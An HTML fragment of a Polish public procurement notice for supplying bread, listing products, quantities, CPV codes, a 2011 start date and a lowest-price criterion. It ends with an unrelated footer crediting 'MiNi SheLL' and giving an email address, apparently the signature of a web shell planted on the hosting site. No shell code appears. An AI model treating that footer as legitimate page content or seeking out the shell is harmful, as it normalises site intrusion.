<li><p><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 01.06.2011.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Dostawa pieczywa.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zadanie nr 5.
1. Bułka pszenna zwykła CPV 15811400-0 - 30 kg
2. Bułka mleczna - CPV - 15811400-0 - 50 kg
3. Rogal maślany - CPV -  15811200- 8 - 80 kg
4. Bułka tarta - CPV 15800000-6 - 100 kg
5. Bułka graham - CPV - 15811100-7 - 200 kg
6. Chleb mieszany krojony foliowany15811100-7- 11000 kg.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.81.11.00-7, 15.81.14.00-0, 15.81.12.00-8, 15.80.00.00-6.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 01.06.2011.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com